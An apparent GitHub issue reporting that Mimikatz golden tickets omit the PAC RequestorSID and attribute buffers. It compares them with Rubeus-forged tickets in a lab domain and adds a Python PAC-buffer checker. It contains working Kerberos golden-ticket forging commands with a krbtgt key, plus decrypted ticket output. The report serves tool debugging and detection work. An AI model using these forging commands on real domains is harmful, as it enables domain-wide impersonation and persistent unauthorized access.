Mimikatz Golden Ticket fails to create PAC attribute RequestorSID
g4uss47 opened this issue
Summary
I was getting KDC_TGT_Revoked errors when using a golden ticket created with Mimikatz, which led me to an investigation in which I found out that the golden ticket created by Mimikatz was failing to create the PAC field correctly: it is not properly setting the RequestorSID and the AttributeFlags as it should, even though the program claims it is doing so.
This was done in an environment in which PAC validation is enforced; therefore, since the RequestorSID field is empty, the PAC validation fails and the golden ticket is revoked.
Replication Steps
Mimikatz Golden Ticket
I first generate a Mimikatz golden ticket for a user called willywonka:
kerberos::golden /domain:chocolatefactory.local /user:willywonka /sid:S-1-5-21-2377760704-1974907900-3052042330 /id:2000 /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /ticket:golden_mimikatz.kirbi
And the execution claims that the PAC is generated and signed:
User : willywonka
Domain : chocolatefactory.local (CHOCOLATEFACTORY)
SID : S-1-5-21-2377760704-1974907900-3052042330
User Id : 2000
Groups Id : *513 512 520 518 519
ServiceKey: ea2344691d140975946372d18949706857eb9c5f65855b0e159e54260beb365c - aes256_hmac
Lifetime : 18/04/2024 22:07:32 ; 16/04/2034 22:07:32 ; 16/04/2034 22:07:32
-> Ticket : golden_mimikatz.kirbi
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
However, as I said previously, this golden ticket was giving me the KDC_TGT_Revoked error, so I investigated and used Rubeus to take a look at what was actually inside the ticket:
.\Rubeus.exe describe /ticket:golden_mimikatz.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.3.2
[*] Action: Describe Ticket
ServiceName : krbtgt/chocolatefactory.local
ServiceRealm : chocolatefactory.local
UserName : willywonka (NT_PRINCIPAL)
UserRealm : chocolatefactory.local
StartTime : 18/04/2024 22:02:54
EndTime : 16/04/2034 22:02:54
RenewTill : 16/04/2034 22:02:54
Flags : pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : yakUMo5Akb7g+D8UayZrl3rn8iaSkX6fULGG/yD1LRk=
Block One Plain Text : 6384000003613084
Decrypted PAC :
LogonInfo :
LogonTime : 18/04/2024 22:02:54
LogoffTime :
KickOffTime :
PasswordLastSet :
PasswordCanChange :
PasswordMustChange :
EffectiveName : willywonka
FullName :
LogonScript :
ProfilePath :
HomeDirectory :
HomeDirectoryDrive :
LogonCount : 0
BadPasswordCount : 0
UserId : 2000
PrimaryGroupId : 513
GroupCount : 5
Groups : 513,512,520,518,519
UserFlags : (0) 0
UserSessionKey : 0000000000000000
LogonServer :
LogonDomainName : CHOCOLATEFACTORY
LogonDomainId : S-1-5-21-2377760704-1974907900-3052042330
UserAccountControl : (528) NORMAL_ACCOUNT, DONT_EXPIRE_PASSWORD
ExtraSIDCount : 0
ResourceGroupCount : 0
ClientName :
Client Id : 18/04/2024 22:02:54
Client Name : willywonka
ServerChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : 6B2DD580E09D063955E48C0E (VALID)
KDCChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : AC649E0CC12A895B62D559F6 (VALID)
As we can see in the contents of the ticket, the AttributeFlags and RequestorSID are missing.
Rubeus Golden Ticket
In order to make a comparison I generated the same golden ticket using Rubeus:
.\Rubeus.exe golden /aes256:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C /user:WillyWonka /id:2000 /domain:chocolatefactory.local /sid:S-1-5-21-2377760704-1974907900-3052042330 /displayname:"Willywonka" /netbios:WILLYWONKA /dc:dc1.chocolatefactory.local /outfile:golden_rubeus.kirbi
[*] Action: Build TGT
[*] Building PAC
[*] Domain : CHOCOLATEFACTORY.LOCAL (WILLYWONKA)
[*] SID : S-1-5-21-2377760704-1974907900-3052042330
[*] UserId : 2000
[*] Groups : 520,512,513,519,518
[*] ServiceKey : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] ServiceKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] KDCKey : EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] KDCKeyType : KERB_CHECKSUM_HMAC_SHA1_96_AES256
[*] Service : krbtgt
[*] Target : chocolatefactory.local
[*] Generating EncTicketPart
[*] Signing PAC
[*] Encrypting EncTicketPart
[*] Generating Ticket
[*] Generated KERB-CRED
[*] Forged a TGT for 'WillyWonka@chocolatefactory.local'
[*] AuthTime : 18/04/2024 22:14:11
[*] StartTime : 18/04/2024 22:14:11
[*] EndTime : 19/04/2024 8:14:11
[*] RenewTill : 25/04/2024 22:14:11
[*] base64(ticket.kirbi):
And analysing it in the same fashion as the golden ticket generated by Mimikatz:
.\Rubeus.exe describe /ticket:golden_rubeus.kirbi /servicekey:EA2344691D140975946372D18949706857EB9C5F65855B0E159E54260BEB365C
[*] Action: Describe Ticket
ServiceName : krbtgt/chocolatefactory.local
ServiceRealm : CHOCOLATEFACTORY.LOCAL
UserName : WillyWonka (NT_PRINCIPAL)
UserRealm : CHOCOLATEFACTORY.LOCAL
StartTime : 18/04/2024 22:03:08
EndTime : 19/04/2024 8:03:08
RenewTill : 25/04/2024 22:03:08
Flags : pre_authent, initial, renewable, forwardable
KeyType : aes256_cts_hmac_sha1
Base64(key) : NZ9U6rbvOS4pbfvj4uphZjm3T2wAdrIA6Grr/P/KFmo=
Block One Plain Text : 6382043530820431
Decrypted PAC :
LogonInfo :
LogonTime : 18/04/2024 22:03:08
LogoffTime :
KickOffTime :
PasswordLastSet :
PasswordCanChange :
PasswordMustChange :
EffectiveName : WillyWonka
FullName : Willywonka
LogonScript :
ProfilePath :
HomeDirectory :
HomeDirectoryDrive :
LogonCount : 0
BadPasswordCount : 0
UserId : 2000
PrimaryGroupId : 513
GroupCount : 5
Groups : 520,512,513,519,518
UserFlags : (0) 0
UserSessionKey : 0000000000000000
LogonServer : DC1
LogonDomainName : WILLYWONKA
LogonDomainId : S-1-5-21-2377760704-1974907900-3052042330
UserAccountControl : (16) NORMAL_ACCOUNT
ExtraSIDCount : 0
ResourceGroupCount : 0
ClientName :
Client Id : 18/04/2024 22:03:08
Client Name : WillyWonka
UpnDns :
DNS Domain Name : CHOCOLATEFACTORY.LOCAL
UPN : WillyWonka@chocolatefactory.local
Flags : (1) NO_UPN_SET
Attributes :
AttributeLength : 2
AttributeFlags : (1) PAC_WAS_REQUESTED
Requestor :
RequestorSID : S-1-5-21-2377760704-1974907900-3052042330-2000
ServerChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : F06ACD94A42E9BC2A49AA1F9 (VALID)
KDCChecksum :
Signature Type : KERB_CHECKSUM_HMAC_SHA1_96_AES256
Signature : 512F28A02087A2D1896FB6A1 (VALID)
The AttributeFlags is properly set to PAC_WAS_REQUESTED and the RequestorSID is properly set.
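As an added example (not from the issue, Mimikatz or Rubeus), a small Python checker that walks the MS-PAC buffer table and applies the two checks this issue turns on: whether PAC_ATTRIBUTES_INFO (type 0x11) and PAC_REQUESTOR (type 0x12) buffers are present, and whether the RequestorSID equals the domain SID plus the user's RID. The two vectors are constructed to mirror the tickets above and carry only those buffers; a real PAC also has logon info, client info and the two signatures.

```python
import struct
# MS-PAC buffer types involved in the issue (values from MS-PAC section 2.4).
PAC_ATTRIBUTES_INFO, PAC_REQUESTOR = 0x11, 0x12
PAC_WAS_REQUESTED = 0x1  # bit 0 of PAC_ATTRIBUTES_INFO.Flags

def parse_pac(blob):
    """Walk the PACTYPE header and return {ulType: raw buffer bytes}."""
    count = struct.unpack_from("<I", blob, 0)[0]  # cBuffers; the next ULONG (Version) is 0
    bufs = {}
    for i in range(count):  # one 16-byte PAC_INFO_BUFFER per buffer, right after the header
        ul_type, size, offset = struct.unpack_from("<IIQ", blob, 8 + 16 * i)
        bufs[ul_type] = blob[offset:offset + size]
    return bufs

def sid_to_str(raw):
    """Decode a binary SID: revision, sub-authority count, 48-bit authority, sub-authorities."""
    auth = int.from_bytes(raw[2:8], "big")
    subs = struct.unpack_from("<%dI" % raw[1], raw, 8)
    return "S-%d-%d%s" % (raw[0], auth, "".join("-%d" % s for s in subs))

def str_to_sid(text):
    """Inverse of sid_to_str; only needed here to build the constructed vectors."""
    rev, auth, *subs = [int(p) for p in text.split("-")[1:]]
    return bytes([rev, len(subs)]) + auth.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)

def check_requestor(blob, domain_sid, rid):
    """Run the two checks from the issue; returns a list of problems ([] means consistent)."""
    bufs, problems = parse_pac(blob), []
    attrs = bufs.get(PAC_ATTRIBUTES_INFO)
    if attrs is None:
        problems.append("PAC_ATTRIBUTES_INFO buffer missing")
    elif not struct.unpack_from("<II", attrs, 0)[1] & PAC_WAS_REQUESTED:  # (FlagsLength, Flags)
        problems.append("PAC_WAS_REQUESTED flag not set")
    req = bufs.get(PAC_REQUESTOR)
    if req is None:
        problems.append("PAC_REQUESTOR buffer missing")
    elif sid_to_str(req) != "%s-%d" % (domain_sid, rid):
        problems.append("RequestorSID %s does not match RID %d" % (sid_to_str(req), rid))
    return problems

def build_pac(entries):
    """Constructed helper: pack (ulType, bytes) pairs into a PACTYPE blob, buffers 8-byte aligned."""
    table, body, first = b"", b"", 8 + 16 * len(entries)
    for ul_type, data in entries:
        table += struct.pack("<IIQ", ul_type, len(data), first + len(body))
        body += data + b"\0" * (-len(data) % 8)
    return struct.pack("<II", len(entries), 0) + table + body

# Constructed vectors mirroring the two tickets above (logon, client and checksum buffers omitted).
DOMAIN_SID, RID = "S-1-5-21-2377760704-1974907900-3052042330", 2000
RUBEUS_LIKE = build_pac([(PAC_ATTRIBUTES_INFO, struct.pack("<II", 2, PAC_WAS_REQUESTED)),
                         (PAC_REQUESTOR, str_to_sid("%s-%d" % (DOMAIN_SID, RID)))])
MIMIKATZ_LIKE = build_pac([])  # neither buffer present, as in the Mimikatz ticket
```

Running `check_requestor(MIMIKATZ_LIKE, DOMAIN_SID, RID)` reports both buffers missing, while the Rubeus-like vector passes.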